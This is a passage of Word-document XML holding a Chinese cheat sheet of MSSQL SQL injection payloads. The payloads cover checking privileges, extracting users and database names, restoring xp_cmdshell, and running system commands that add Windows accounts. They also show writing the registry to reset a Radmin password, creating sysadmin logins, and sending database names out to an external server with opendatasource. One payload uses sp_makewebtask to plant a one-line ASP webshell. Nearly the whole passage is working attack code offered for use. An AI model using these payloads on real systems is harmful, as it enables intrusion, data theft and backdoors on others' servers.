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94" w:rsidRDefault="001F1794" w:rsidP="001F1794">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="1Char"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1794">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
        </w:rPr>
        <w:t>常用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
        </w:rPr>
        <w:t>注入代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0007493E" w:rsidRDefault="001F1794" w:rsidP="001F1794">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1794">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>文章分类</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看看是什么权限的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select IS_MEMBER('db_owner')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是否有读取某数据库的权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1= (Select HAS_DBACCESS('master')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数字类型</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and char(124)%2Buser%2Bchar(124)=0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字符类型</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' and char(124)%2Buser%2Bchar(124)=0 and ''=' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>搜索类型</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' and char(124)%2Buser%2Bchar(124)=0 and '%'=' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>爆</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and user&gt;0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' and user&gt;0 and ''=' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是否为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是不是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and exists (select * from sysobjects);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是否支持多行</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @d int;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> xp_cmdshell </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>｛ＡＴ｝</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>@version') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>//----------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>执行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//----------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>首先开启沙盘模式：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后利用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>jet.oledb</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>执行系统命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> admin admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>1234 /add")') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>执行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>扩展存储过程是否存在：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="001F1794">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.1.5/display.asp?keyno=188</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F1794">
        <w:t> and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>写注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>REG_SZ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读取目录内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_dirtree 'c:\winnt\system32\',1,1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库备份</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>backup database pubs to disk = 'c:\123.bak' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>爆出长度</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>口令方法：用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>综合利用工具连接后，执行命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_password NULL,'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>新密码</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>','sa' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>添加和删除一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master.dbo.sp_addlogin test,ptlove </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master.dbo.sp_addsrvrolemember test,sysadmin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>删除扩展存储</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>过</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_dropextendedproc 'xp_cmdshell' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>添加扩展存储过过程</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>GRANT exec On xp_proxiedadata TO public </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>停掉或激活某个服务。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_servicecontrol 'stop','schedule' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_servicecontrol 'start','schedule' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbo.xp_subdirs </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>只列某个目录下的子目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbo.xp_makecab </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>将目标多个档案压缩到某个目标档案之内。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbo.xp_makecab </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'c:\test.cab','mszip',1, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'C:\Inetpub\wwwroot\SQLInject\login.asp', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_terminate_process </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>停掉某个执行中的程序，但赋予的参数是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> Process ID</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>工作管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>，透过选单「检视」</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>「选择字段」</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>勾选</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> pid</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，就可以看到每个执行程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> Process ID </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>xp_terminate_process 2484 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_unpackcab </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>解开压缩档。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_unpackcab 'c:\test.cab','c:\temp',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>某机，安装了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>radmin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，密码被修改了，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>regedit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>不知道被删除了还是被改名了，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>net.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>不存在，没有办法使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">regedit /e </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>导入注册文件，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>mssql</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限，使用如下命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>即可修改密码为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>12345678</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>。如果要修改端口值</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>则端口值改为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1234 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>create database lcx; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Create TABLE ku(name nvarchar(256) null); </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Create TABLE biao(id int NULL,name nvarchar(256) null); </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>中创建表，看看权限怎样</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> sp_makewebtask</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>直接在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>目录里写入一句话马：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001F1794">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dblogin123.asp?usernam ... btask%20'd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F1794">
        <w:t>:\www\tt\88.asp','%20select%20''&lt;%25execute(request("a"))%25&gt;''%20';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>更新表内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Update films SET kind = 'Dramatic' Where id = 123 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>删除内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
